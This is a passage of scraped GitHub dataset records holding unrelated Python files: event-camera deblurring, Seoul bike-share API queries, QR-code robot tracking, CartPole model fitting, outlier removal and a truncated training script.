np.zeros((img_height, img_width, 3), dtype='uint8')\n self.event_frame_2 = np.zeros((img_height, img_width, 3), dtype='float')\n self.hot_pixel_enum_list = np.zeros((260, 346),dtype='uint8')\n def get_input_frame(self):\n return deepcopy(self.input_frame)\n\n def get_input_frame_2(self):\n return deepcopy(self.input_frame_2)\n\n def get_deblur_frame(self):\n return deepcopy(self.deblur_frame)\n\n def get_event_frame(self):\n # self.event_frame = self.event_frame/np.max(self.event_frame)*255\n\n # return_event_frame = return_event_frame/np.max(return_event_frame)*255\n return deepcopy(self.event_frame)\n\n def get_event_frame_2(self):\n # self.event_frame = self.event_frame/np.max(self.event_frame)*255\n\n # return_event_frame = return_event_frame/np.max(return_event_frame)*255\n return deepcopy(self.event_frame_2)\n\n def run(self) -> None:\n global deblur_waiting_flag\n global model\n while (not thread_exit):\n thread_lock.acquire()\n frame = self.raw_thread.get_last_frame()\n last_timestamp = self.raw_thread.get_last_frame_timestamp()\n deblur_events = self.raw_thread.get_deblur_events()\n thread_lock.release()\n # deblur事件还不够\n if (deblur_events is None) or (deblur_events.size == 0):\n deblur_waiting_flag = True\n continue\n # 检测是否丢包,或者运动幅度不够大,没有足够的事件数量\n if Event_package_loss(deblur_events, exposure_time) or deblur_events.shape[0] < 8000:\n # event_list = self.raw_thread.get_event_list()\n deblur_waiting_flag = True\n continue\n # 采集线程已经采集到足够deblur的事件以及对应的APS帧了\n if not deblur_waiting_flag:\n # print(deblur_events.size)\n deblur_waiting_flag = True\n self.input_frame = frame\n if len(deblur_events.shape) > 1:\n self.event_frame = np.zeros(self.event_frame.shape, dtype='float')\n else:\n deblur_waiting_flag = True\n continue\n\n # # 生成hot_pixel_detect使用的事件帧\n # for i in range(deblur_events.shape[0]):\n # if deblur_events[i, 3] == 1:\n # self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 2] = self.event_frame[\n # deblur_events[i, 2],\n # deblur_events[\n # i, 1], 2] + 1\n # else:\n # self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 0] = self.event_frame[\n # deblur_events[i, 2],\n # deblur_events[\n # i, 1], 0] + 1\n # hot_pixel_list = hot_pixel_detect(self.event_frame[:, :, 2].squeeze(),\n # self.event_frame[:, :, 0].squeeze(), 4)\n # print(hot_pixel_list)\n\n\n\n # 去除hot pixel\n\n # 其实对于某个设备,每个设定bias,hot pixel应该是固定的,在默认阈值下,hot pixel 应该为\n # [[ 61 161]\n # [136 197]\n # [207 188]\n # [237 257]]\n #\n # 如果从可视化事件帧里发现事件帧不对,可能是hot pixel 变了,这时候再uncomment上面的hot_pixel_detect\n hot_pixel_list = np.array([[61, 161], [136, 197], [207, 188], [237, 257]])\n print(f'Event count before hot pixel removal:{deblur_events.shape[0]}')\n\n for i in range(hot_pixel_list.shape[0]):\n loc = np.where(\n (deblur_events[:, 2] == hot_pixel_list[i, 0]) & (deblur_events[:, 1] == hot_pixel_list[i, 1]))\n deblur_events = np.delete(deblur_events, loc, axis=0)\n\n\n\n\n if len(deblur_events.shape) > 1:\n self.event_frame = np.zeros(self.event_frame.shape, dtype='float')\n for i in range(deblur_events.shape[0]):\n if deblur_events[i, 3] == 1:\n self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 2] = self.event_frame[\n deblur_events[i, 2],\n deblur_events[\n i, 1], 2] + 1\n else:\n self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 0] = self.event_frame[\n deblur_events[i, 2],\n deblur_events[\n i, 1], 0] + 1\n\n # for i in range(hot_pixel_list.shape[0]):\n # loc = np.where(\n # (deblur_events[:, 2] == hot_pixel_list[i, 0]) & (deblur_events[:, 1] == hot_pixel_list[i, 1]))\n # deblur_events = np.delete(deblur_events, loc, axis=0)\n\n print(f'Event count after hot pixel removal:{deblur_events.shape[0]}')\n cv2.normalize(self.event_frame, self.event_frame, 0, 1, cv2.NORM_MINMAX)\n self.event_frame = cv2.putText(self.event_frame, 'event num: %d' % deblur_events.shape[0], [0, 60],\n cv2.FONT_HERSHEY_SIMPLEX, 1, (1, 1, 1), 3)\n\n # 送入推理\n out_img = davis346_inference(frame, deblur_events, last_timestamp,model)\n self.deblur_frame = out_img\n self.event_frame_2 = self.event_frame\n self.input_frame_2[:, :, 0] = self.input_frame\n self.input_frame_2[:, :, 1] = self.input_frame\n self.input_frame_2[:, :, 2] = self.input_frame\n\n # time.sleep(0.5)\n # self.render_data.put(deblured_img)\n\n\ndef main():\n global thread_exit\n global deblur_waiting_flag\n global exposure_time\n global model\n parser = argparse.ArgumentParser(description='Show a preview of an iniVation event camera input.')\n args = parser.parse_args()\n cv2.namedWindow(\"DAVIS Frame Output\", cv2.WINDOW_GUI_NORMAL)\n cv2.namedWindow('Input Frame', cv2.WINDOW_GUI_NORMAL)\n cv2.namedWindow('Deblur Frame', cv2.WINDOW_GUI_NORMAL)\n cv2.namedWindow('Event Frame', cv2.WINDOW_GUI_NORMAL)\n # Open the camera\n camera = dv.io.CameraCapture()\n camera.setDavisExposureDuration(datetime.timedelta(milliseconds=exposure_time))\n camera.setDavisFrameInterval(datetime.timedelta(milliseconds=int(exposure_time)))\n\n # camera.setDVSGlobalHold(False) # no use\n camera.deviceConfigSet(-3,1,50000) #设定发包间隔,默认为10000微秒。改为50,000微妙后显示帧率降低,但是减少出��event buffer overflow的概率\n # 可能的修改阈值方法@https://gitlab.com/inivation/inivation-docs/-/blob/master/Advanced%20configurations/User_guide_-_Biasing.md\n # camera.deviceConfigSet(5, 12, 16420)\n # camera.deviceConfigSet(5, 11, 24573)\n print(camera.deviceConfigGet(-3, 1))\n # test = camera.caerDeviceConfigGet(camera.deviceConfigGet(5, 12))\n # 加载模型\n\n # weight_path = './net_g_latest_REBlur.pth'\n weight_path = './net_g_latest_GoPro.pth'\n # weight_path = './net_g_latest.pth'\n # weight_path = './net_g_gray.pth'\n model = EFNet().cuda()\n # 测试跑通不需要权重\n # model.load_state_dict(torch.load(weight_path))\n # TODO load_network 放到main 线程(出现过bug)\n model = load_network(model, weight_path, True, param_key='params')\n\n model.eval()\n\n # print(camera.isRunning())\n img_height = 260\n img_width = 346\n thread_davis = DAVIS(img_height, img_width, camera)\n thread_davis.start()\n deblur = RenderFrame(\"RenderFrame\", thread_davis, img_height, img_width)\n deblur.start() # 开始线程\n\n # 在主线程处理渲染完成的画面\n '''\n 由于 OpenCV 的限制,无法在子线程中使用 nameWindow 或者 imshow 等方法\n 只能新建一个多线程列队将渲染完成的信息加入到列队,然后再在主线程中展示出来\n '''\n while not thread_exit:\n # start_time = time.time()\n thread_exit = not camera.isRunning()\n thread_lock.acquire()\n frame = thread_davis.get_frame()\n\n deblur_frame = deblur.get_deblur_frame()\n render_frame = deblur.get_input_frame_2()\n event_frame = deblur.get_event_frame_2()\n thread_lock.release()\n cv2.imshow('DAVIS Frame Output', frame)\n\n # 如果获取的帧不为空\n cv2.imshow('Input Frame', render_frame)\n cv2.imshow('Event Frame', event_frame)\n cv2.imshow('Deblur Frame', deblur_frame)\n if cv2.waitKey(1) == 27:\n thread_exit = True\n cv2.destroyAllWindows()\n # end_time = time.time()\n # print(\"FPS: \", 1 / (end_time - start_time))\n # break\n # DAVIS346采集线程\n thread_davis.join()\n # Deblur 处理线程\n deblur.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Reza-Zhu/DAVIS346_deblur","sub_path":"multi_show(start).py","file_name":"multi_show(start).py","file_ext":"py","file_size_in_byte":17614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32828526283","text":"import requests\n\nurl = \"http://openapi.seoul.go.kr:8088/515261424a696d743732716e434c62/json/bikeList/1/1000/\"\nres = requests.get(url)\ndata = res.json()\n# print(data)\nRealTime = data['rentBikeStatus']['row']\n# print(RealTime)\nfor i in RealTime:\n print(i['stationName'])\n print('거치대개수:', i['rackTotCnt'],'개,', '자전거주차총건수:', i['parkingBikeTotCnt'], '개,', '거치율:', i['shared'], '%')\n print(\"위도: \", i['stationLatitude'] , ',', \"경도: \", i['stationLongitude'])\n print()\n","repo_name":"cheonseohee/proj_django","sub_path":"theme/templatetags/bicycle_seoul.py","file_name":"bicycle_seoul.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"44710713751","text":"from turtle import circle\nimport cv2\nimport pyzbar.pyzbar as pyzbar\nimport numpy as np\nimport sys\n\nW_REF = 0.0\nH_REF = 0.0\n\ndstPoints = 15*np.array([np.array((6.0,6.0)),\n np.array((11.6+6.0,6.0)),\n np.array((0.0+6.0,18.4+6.0)),\n np.array((11.6+6.0,18.4+6.0)),])\n\ndef display(im, decodedObjects, message=\"Results\"): \n # Loop over all decoded objects\n\n for decodedObject in decodedObjects:\n\n points = decodedObject.polygon\n # If the points do not form a quad, find convex hull\n if len(points) > 4:\n hull = cv2.convexHull(\n np.array([point for point in points], dtype=np.float32)\n )\n hull = list(map(tuple, np.squeeze(hull)))\n\n else:\n hull = points\n\n # Number of points in the convex hull\n n = len(hull)\n # Draw the convext hull\n for j in range(0, n):\n cv2.line(im, hull[j], hull[(j + 1) % n], (255, 0, 0), 2)\n\n # Display results\n cv2.imshow(message, im)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nclass QRDecoder:\n def __init__(self):\n self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n self.cap.set(3,640)\n self.cap.set(4,480)\n self.h_corr = 1.0\n self.w_corr = 1.0\n\n def calibration(self):\n decodedObjects = []\n\n while len(decodedObjects) != 4:\n _, img = self.cap.read()\n decodedObjects = pyzbar.decode(img)\n if cv2.waitKey(1) == ord(\"q\"):\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n sys.exit()\n \n display(img, decodedObjects, message=\"Detected beacons\")\n \n centers = {}\n for obj in decodedObjects:\n data = obj.data\n points = obj.polygon\n points = np.array([point for point in points])\n center = np.sum(points, axis=0) / 4\n center = center.astype(int)\n centers[data] = center\n cv2.circle(img, tuple(center), 1, (0, 0, 255), 5)\n\n cv2.imshow(\"\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n top_left = centers[b\"top_left_ref\"]\n print(top_left)\n top_right = centers[b\"top_right_ref\"]\n bottom_left = centers[b\"http://bottom_left_ref\"]\n bottom_right = centers[b\"bottom_right_ref\"]\n srcPoints = np.array([top_left, top_right, bottom_left, bottom_right])\n print(srcPoints)\n print(dstPoints)\n H, _ = cv2.findHomography(srcPoints, dstPoints)\n img_warp = cv2.warpPerspective(img, H, (img.shape[1], img.shape[0]))\n cv2.imshow(\"warp\", img_warp)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n exit(H)\n h_obs = bottom_left[0] - top_left[0]\n w_obs = top_left[1] - top_left[1]\n\n self.h_corr = 1 - (h_obs / H_REF)\n self.w_corr = 1 - (w_obs / W_REF)\n\n def decode(self, im):\n decodedObjects = pyzbar.decode(im)\n\n if not decodedObjects:\n return None, None\n\n for obj in decodedObjects:\n if obj.data == \"robot\":\n robot = obj\n break\n\n left, top, width, height = robot.rect\n\n top_left = np.array([top, left])\n top_right = np.array([top, left + width])\n bottom_left = np.array([top - height, left])\n bottom_right = np.array([top - height, left + width])\n\n center = (top_left + top_right + bottom_left + bottom_right) / 4\n center = [center[0] * self.h_corr, center[1] * self.w_corr]\n\n return decodedObjects, center\n\n def tracking(self):\n while True:\n _, img = self.cap.read()\n decodedObjects, center = self.decode(img)\n print(\"CENTER : \", center)\n if decodedObjects:\n display(img, decodedObjects)\n if cv2.waitKey(1) == ord(\"q\"):\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n sys.exit()\n\n\ndef main():\n decoder = QRDecoder()\n decoder.calibration()\n key = input(\"Once Cozmo is set, press any litteral key to continue.\")\n if key:\n decoder.tracking()\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ADebor/cozmo_tracking","sub_path":"qr/qr_detector.py","file_name":"qr_detector.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39522828080","text":"from os import listdir\nfrom os.path import exists, isdir, join\nfrom typing import List\n\nfrom wfa_planning_evaluation_framework.filesystem_wrappers import (\n filesystem_wrapper_base,\n)\nfrom wfa_planning_evaluation_framework.filesystem_wrappers import (\n filesystem_pathlib_wrapper,\n)\nfrom wfa_planning_evaluation_framework.data_generators.data_set import DataSet\n\n\nFsWrapperBase = filesystem_wrapper_base.FilesystemWrapperBase\nFsPathlibWrapper = filesystem_pathlib_wrapper.FilesystemPathlibWrapper\n\n\nclass DataDesign:\n \"\"\"A collection of DataSets used for evaluating an ExperimentalDesign.\"\"\"\n\n def __init__(self, dirpath: str, filesystem: FsWrapperBase = FsPathlibWrapper()):\n \"\"\"Constructor\n\n Args:\n dirpath: The directory on disk where the DataSets comprising this\n DataDesign will be stored.\n filesystem: The filesystem object that manages all file operations.\n \"\"\"\n self._dirpath = dirpath\n self._data_set_names = set()\n self._filesystem = filesystem\n\n self._filesystem.mkdir(dirpath, parents=True, exist_ok=True)\n for p in sorted(self._filesystem.glob(dirpath, \"*\")):\n if self._filesystem.is_dir(p):\n self._data_set_names.add(self._filesystem.name(p))\n\n @property\n def count(self) -> int:\n \"\"\"Number of DataSets represented in this design.\"\"\"\n return len(self._data_set_names)\n\n @property\n def names(self) -> List[str]:\n \"\"\"Returns a list of the DataSet names in this DataDesign.\"\"\"\n return sorted(self._data_set_names)\n\n def by_name(self, name: str) -> DataSet:\n \"\"\"Returns the DataSet having the given name.\"\"\"\n return DataSet.read_data_set(join(self._dirpath, name), self._filesystem)\n\n def add(self, data_set: DataSet) -> None:\n \"\"\"Adds a DataSet to this DataDesign.\"\"\"\n data_set_path = self._filesystem.joinpath(self._dirpath, data_set.name)\n if self._filesystem.exists(data_set_path):\n raise ValueError(\n \"This DataDesign already contains a DataSet with name {}\".format(\n data_set.name\n )\n )\n data_set.write_data_set(self._dirpath, filesystem=self._filesystem)\n self._data_set_names.add(data_set.name)\n","repo_name":"world-federation-of-advertisers/planning-evaluation-framework","sub_path":"src/data_generators/data_design.py","file_name":"data_design.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"22587890049","text":"#!/usr/bin/env python\n# https://www.gymlibrary.ml/pages/environments/classic_control/cart_pole\n\nimport json\nimport sys\nimport time\n\nimport numpy as np\nfrom llog import floora, floorʹ, log, plot\n\nif '--spin' in sys.argv:\n import gym\n\n sessions = []\n\n # 'Blackjack-v1', 'FrozenLake-v1', 'Taxi-v3', 'MountainCar-v0', 'FrozenLake-v1', 'Pendulum-v1',\n # 'Acrobot-v1', 'MountainCarContinuous-v0'\n env = gym.make('CartPole-v1')\n\n while len(sessions) < 1234:\n env.reset()\n actions = []\n observations = []\n for frame in range(234):\n if '--render' in sys.argv:\n env.render()\n time.sleep(.02)\n\n action = int(env.action_space.sample())\n observation, reward, done, info = env.step(action)\n\n actions.append(action)\n observations.append(observation.tolist())\n\n if done:\n break\n\n sessions.append((actions, observations))\n\n env.close()\n\n open('cartpole.json', 'w').write(json.dumps(sessions))\n\n\ndef load_inputs():\n sessions = json.loads(open('cartpole.json', 'r').read())\n inputs, outputs = [], []\n for actions, observations in sessions:\n for j in range(1, len(observations)):\n inputs.append([*observations[j - 1], actions[j]])\n outputs.append(observations[j])\n return sessions, inputs, outputs\n\n\ndef elm():\n '''infer with ELM'''\n\n sys.path.insert(0, '../elm')\n import elm\n sys.path.remove('../elm')\n\n # infer: elm (stateⱼ₋₁, actionⱼ) = stateⱼ\n _, inputs, outputs = load_inputs()\n weights, bias, β = elm.train(31, inputs, outputs)\n # 3 .. 0.27\n # 31 .. 0.22\n # 314 .. 0.22\n # 1234 .. 0.22\n\n predictions = []\n for input in inputs:\n predictions.append(elm.infer(weights, bias, β, input))\n\n mse = np.square(np.subtract(outputs, predictions)).mean()\n log(floorʹ(mse))\n\n\ndef jax():\n '''infer with JAX'''\n\n import jax\n import jax.numpy as jnp\n\n sys.path.insert(0, '../math')\n import jax_adabelief as jb\n sys.path.remove('../math')\n\n def predict(params, input):\n previous_velocity, action = input[1], input[4]\n inc = jax.lax.cond(action, lambda: params[0], lambda: -params[0])\n velocity = previous_velocity + inc\n return velocity\n\n batched_predict = jax.vmap(predict, in_axes=(None, 0))\n\n def loss(params, xs, ys):\n pred = batched_predict(params, xs)\n return jnp.mean((pred - ys)**2)\n\n _, inputs, outputs = load_inputs()\n xs = jnp.array(inputs)\n ys = jnp.array([o[1] for o in outputs])\n\n def plot_loss():\n lossˉ = jax.jit(loss).lower(jnp.array([0.1]), xs, ys).compile()\n a = [[' ' for x in range(111)] for y in range(5)]\n pxs, pys = [], []\n for p in range(9):\n pxs.append(p / 10)\n pys.append(lossˉ(jnp.array([p / 10]), xs, ys))\n map = plot(a, pxs, pys)\n print('\\n'.join(''.join(y) for y in a))\n\n plot_loss()\n\n m = jnp.zeros(1)\n s = jnp.zeros(1)\n rkey = jax.random.PRNGKey(1)\n params = jax.random.normal(rkey, (1,))\n\n def optimise(epoch, m, s, params, xs, ys):\n lossʹ, grads = jax.value_and_grad(loss)(params, xs, ys)\n m, s, params = jb.adabeliefʹ(epoch, grads, m, s, params)\n return m, s, params, lossʹ\n\n optimiseˉ = jax.jit(optimise).lower(1, m, s, params, xs, ys).compile()\n for epoch in range(314):\n m, s, params, lossʹ = optimiseˉ(epoch, m, s, params, xs, ys)\n log(epoch, params, np.format_float_positional(lossʹ))\n\n\nif '--xgboost' in sys.argv: # infer with xgboost\n import xgboost as xgb\n _, inputs, outputs = load_inputs()\n velocity = [o[1] for o in outputs]\n param = {'max_depth': 3}\n dtrain = xgb.DMatrix(inputs, label=velocity)\n best = xgb.train(param, dtrain, evals=[(dtrain, 'train')], num_boost_round=314)\n for count, (input, expected) in enumerate(zip(inputs, outputs)):\n prediction = best.predict(xgb.DMatrix([input]))[0]\n log(f\"prediction {prediction} expected {expected[1]}\")\n if 32 < count:\n break\n\n gv = xgb.to_graphviz(best)\n open('velocity.pdf', 'wb').write(gv.pipe())\n\nif '--tf' in sys.argv: # Inference with TF\n from tensorflow import keras\n from tensorflow.keras import layers\n\n tf_inputs = keras.Input(shape=(5,), name=\"state-and-action\")\n x = layers.Dense(314, activation=\"relu\", name=\"dense_1\")(tf_inputs)\n x = layers.Dense(314, activation=\"relu\", name=\"dense_2\")(x)\n tf_outputs = layers.Dense(4, activation=\"softmax\", name=\"state-prediction\")(x)\n # 3 .. 0.18\n # 31 .. 0.18\n # 314 .. 0.18\n\n model = keras.Model(inputs=tf_inputs, outputs=tf_outputs)\n\n model.compile(optimizer=keras.optimizers.Adam(learning_rate=0.1), loss=keras.losses.MeanSquaredError())\n\n _, inputs, outputs = load_inputs()\n inputs = np.vstack(inputs).astype('float32')\n outputs = np.vstack(outputs).astype('float32')\n\n # https://www.tensorflow.org/api_docs/python/tf/keras/Model#fit\n history = model.fit(inputs[3:], outputs[3:], validation_split=0.01, epochs=2022)\n\n predictions = model.predict(inputs)\n log(outputs[0], '-', predictions[0])\n\n mse = np.square(np.subtract(outputs, predictions)).mean()\n log(floorʹ(mse))\n\nif '--neat' in sys.argv: # Inference with NEAT\n import neat\n\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet,\n neat.DefaultStagnation, 'neat.conf')\n _, inputs, outputs = load_inputs()\n\n for output_selection in range(4):\n\n p = neat.Population(config)\n\n #p.add_reporter(neat.StdOutReporter(False))\n\n\n def eval_genomes(genomes, config):\n for genome_id, genome in genomes:\n genome.fitness = 4.0\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n for count, (input, expected) in enumerate(zip(inputs, outputs)):\n prediction = net.activate(input)\n genome.fitness -= np.square(np.subtract(prediction[0], expected[output_selection])).mean()\n if 123 < count:\n break\n\n winner = p.run(eval_genomes)\n\n log(f\"output_selection {output_selection} genome:\\n{winner}\")\n\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n\n for count, (input, expected) in enumerate(zip(inputs, outputs)):\n prediction = winner_net.activate(input)\n expected = floorʹ(expected[output_selection])\n log(f\"output_selection {output_selection} expected {expected} predicted {floorʹ(prediction[0])}\")\n if 32 < count:\n break\n\nif '--pgm' in sys.argv: # Inference with PGM\n import pandas as pd\n from pgmpy.estimators import MaximumLikelihoodEstimator\n from pgmpy.models import BayesianNetwork\n\n model = BayesianNetwork([\n (\"Action\", \"VelocityChange\"),\n ])\n\n sessions = json.loads(open('cartpole.json', 'r').read())\n actions, veloΔ = [], []\n for acs, obs in sessions:\n for j in range(1, len(obs)):\n actions.append(acs[j])\n veloΔ.append(floorʹ(obs[j][1] - obs[j - 1][1]))\n\n data = {'Action': actions, 'VelocityChange': veloΔ}\n data = pd.DataFrame(data=data)\n\n model.fit(data=data, estimator=MaximumLikelihoodEstimator)\n print(model.get_cpds(\"VelocityChange\"))\n\nif __name__ == '__main__':\n if '--elm' in sys.argv:\n elm()\n elif '--jax' in sys.argv:\n jax()\n else:\n jax()\n","repo_name":"ArtemGr/bounty","sub_path":"data/gym/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"41720251515","text":"class Solution:\n def subdomainVisits(self, cpdomains: List[str]) -> List[str]:\n dic={}\n for i in cpdomains:\n i=i.split()\n nu=int(i[0])\n we=i[1]\n we=we.split('.')\n for j in range(len(we)):\n si='.'.join(we[j:len(we)])\n dic[si]=dic.get(si,0)+nu\n li=[]\n for k,v in dic.items():\n li.append(str(v)+' '+k)\n return li\n","repo_name":"EbaAdisu/A2SV-PROJECTS","sub_path":"DIV3/811. Subdomain Visit Count/subdomainvisit.py","file_name":"subdomainvisit.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18488873515","text":"from pathlib import Path\nimport pandas as pd\nfrom pandas.core.frame import DataFrame\nfrom ..utils.logger import Logger\n\n\nclass Outliers:\n\n def __init__(self,df: DataFrame):\n self.logger = Logger(__name__, __name__ == '__main__')\n self.df = df\n \n\n def detect(self):\n self.logger.info(f\"Started outlier detection.\")\n self.logger.info(f\"Dataset shape before outlier removal : {self.df.shape}\")\n num_cols = ['kms_driven','price']\n\n for col in num_cols:\n\n max_val = self.df[col].quantile(.99)\n\n min_val = self.df[col].quantile(.1)\n\n self.logger.info(f\"Min/Max Range for {col} is {min_val} / {max_val}\")\n\n total_outs = self.df[~(self.df[col] <= max_val)].shape[0]\n\n self.logger.info(f\"Total outliers detected for {col} is {total_outs}\")\n\n self.df = self.df[(self.df[col] <= max_val)]\n\n self.logger.info(f\"Outliers removed for {col} based on min/max quantile of (.1, .99).\")\n\n # remove bikes which has age more than 15 yrs\n self.df = self.df[self.df['age'] <= 16]\n\n self.logger.info(f\"Dataset shape after outlier removal : {self.df.shape}\")\n\n self.logger.info(f\"Finished outlier detection.\")\n\n return self.df\n\n\n def _get_num_features(self):\n return self.df.select_dtypes(exclude='object').columns\n\n\nif __name__ == '__main__':\n Outliers('data/processed/data.csv').detect()\n\n\n","repo_name":"ropali/used_bike_price_prediction","sub_path":"src/features/outliers.py","file_name":"outliers.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"40956259057","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nsave = False if input(\"Save figures? \").lower() == 'no' else True\n\ntac = 0.234\ntag = 0.456\ntl = 0.0125\ntw = 0.0125\nbw = 80\n\ntmpMx = np.arange(2, 10)\ntmpMy = np.arange(2, 10)\nMsx, Msy = np.meshgrid(tmpMx, tmpMy)\n\n# Shared Memory\n\ndef AI_shared(Mx, My):\n return (2*Mx * My) / (4.0 * 4.0 + 4.0 * Mx * My)\n\ndef perf_shared(Mx, My):\n return AI_shared(Mx, My) * bw\n\nPers = np.zeros((len(tmpMx),len(tmpMy)))\nfor i in range(8):\n for j in range(8):\n Pers[i,j] = perf_shared(tmpMx[i], tmpMy[j])\n\nfig = plt.figure(figsize=(20,10))\nax = fig.gca(projection='3d')\nax.set_xlabel(\"Mx\")\nax.set_ylabel(\"My\")\nax.set_zlabel(\"Performance (GFlops/s)\")\nsurf = ax.plot_surface(Msx, Msy, Pers, cmap=\"viridis\")\nfig.colorbar(surf)\nif save == True:\n plt.savefig(\"../figures/theoretical_shared_performance.png\",format=\"png\")\nplt.show()\n\n# Constant Memory\n\ndef AI_constant(Mx, My):\n return (2*Mx * My) / (4.0 * 4.0)\n\ndef perf_constant(Mx, My):\n return AI_constant(Mx, My) * bw\n\nPers = np.zeros((len(tmpMx),len(tmpMy)))\nfor i in range(8):\n for j in range(8):\n Pers[i,j] = perf_constant(tmpMx[i], tmpMy[j])\n\nfig = plt.figure(figsize=(20,10))\nax = fig.gca(projection='3d')\nax.set_xlabel(\"Mx\")\nax.set_ylabel(\"My\")\nax.set_zlabel(\"Performance (GFlops/s)\")\nsurf = ax.plot_surface(Msx, Msy, Pers, cmap=\"viridis\")\nfig.colorbar(surf)\nif save == True:\n plt.savefig(\"../figures/theoretical_constant_performance.png\",format=\"png\")\nplt.show()\n\n# Adaptive tiling (1x21 tiling)\n\ndef AI_adaptive(Mx, My, T):\n return (2*Mx * My * T) / (4.0*(2.0 * 4.0 + (T-2)*2.0))\n\ndef perf_adaptive(Mx, My,T):\n return AI_adaptive(Mx, My,T) * bw\n\ntiling = 21\nPers = np.zeros((len(tmpMx),len(tmpMy)))\nfor i in range(8):\n for j in range(8):\n Pers[i,j] = perf_adaptive(tmpMx[i], tmpMy[j], tiling)\n\nfig = plt.figure(figsize=(20,10))\nax = fig.gca(projection='3d')\nax.set_xlabel(\"Mx\")\nax.set_ylabel(\"My\")\nax.set_zlabel(\"Performance (GFlops/s)\")\nsurf = ax.plot_surface(Msx, Msy, Pers, cmap=\"viridis\")\nfig.colorbar(surf)\nif save == True:\n plt.savefig(\"../figures/theoretical_tiling_performance.png\",format=\"png\")\nplt.show()\n","repo_name":"burklight/GPU-Accelerated-Edge-Detection","sub_path":"tests/plot_theoretical_ai.py","file_name":"plot_theoretical_ai.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"17134840318","text":"from PyQt5.QtGui import QPixmap\nfrom uiElements.common import Common\nfrom PIL import Image\nfrom PyQt5.QtWidgets import *\n\n\nclass ImageCodes(Common):\n def __init__(self, bounds, curr_window, img_name):\n super().__init__(bounds, curr_window, img_name)\n # Generate empty image dimension (w and h)\n # self.size = (int(self.x_max - self.x_min), int(self.y_max - self.y_min))\n\n def getImage(self, id):\n Image.new(mode=\"RGB\", size=self.size, color=0).save(f\"images/img_{id}.jpg\")\n label = QLabel(self.curr_window)\n label.setGeometry(self.x_min, self.y_min, self.x_max-self.x_min, self.y_max-self.y_min)\n label.setPixmap(QPixmap(f\"images/img_{id}.jpg\"))\n # Let's write these codes to our bare codes file\n with open(f\"codes/{self.image_name}.py\", 'a') as code:\n code.write(f'\\n# Codes for the image placeholder\\n')\n code.write(f'Image.new(mode=\"RGB\", size={self.size}, color={0}).save(f\"images/img_{id}.jpg\")\\n')\n code.write(f'label = QLabel(curr_window)\\n')\n code.write(f'label.setGeometry({self.x_min}, {self.y_min}, {self.x_max - self.x_min}, {self.y_max - self.y_min})\\n')\n code.write(f'label.setPixmap(QPixmap(f\"images/img_{id}.jpg\"))\\n')\n return self.curr_window\n","repo_name":"muga01/CodeGenerator","sub_path":"uiElements/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16104433219","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms, datasets\n\nfrom dataset import *\nfrom copy import copy\n\nimport warnings\nimport time\n\nwarnings.filterwarnings('ignore')\n\n\ndef train(args):\n new_train = args.train_dir\n\n new_val = args.new_dir # processed SPDS-RPS\n new_val = preprocess(args.val_dir, new_val) # SPDS-RPS validation processe\n\n num_train = len(os.listdir(os.path.join(new_train, 'rock/'))) + \\\n len(os.listdir(os.path.join(new_train,'paper/'))) + \\\n len(os.listdir(os.path.join(new_train, 'scissors/')))\n\n num_val = len(os.listdir(os.path.join(args.val_dir, 'rock/'))) + \\\n len(os.listdir(os.path.join(args.val_dir, 'paper/'))) + \\\n len(os.listdir(os.path.join(args.val_dir, 'scissors/'))) \n\n print(\"%d training images, %d validation images\" % (num_train, num_val))\n\n transform = transforms.Compose([ToTensor()])\n dataset_train = CustomDataset(new_train, transform=transform, train = True)\n loader_train = DataLoader(dataset_train, batch_size = args.batchsize, \\\n shuffle=True, collate_fn=dataset_train.custom_collate_fn, num_workers=8)\n \n dataset_val = CustomDataset(new_val, transform=transform) #SPDS-RPS\n loader_val = DataLoader(dataset_val, batch_size=num_val, \\\n shuffle=True, collate_fn=dataset_val.custom_collate_fn, num_workers=8)\n \n # Define Model\n model = nn.Sequential(nn.Conv2d(1, 32, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(32, 64, 2, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(64, 128, 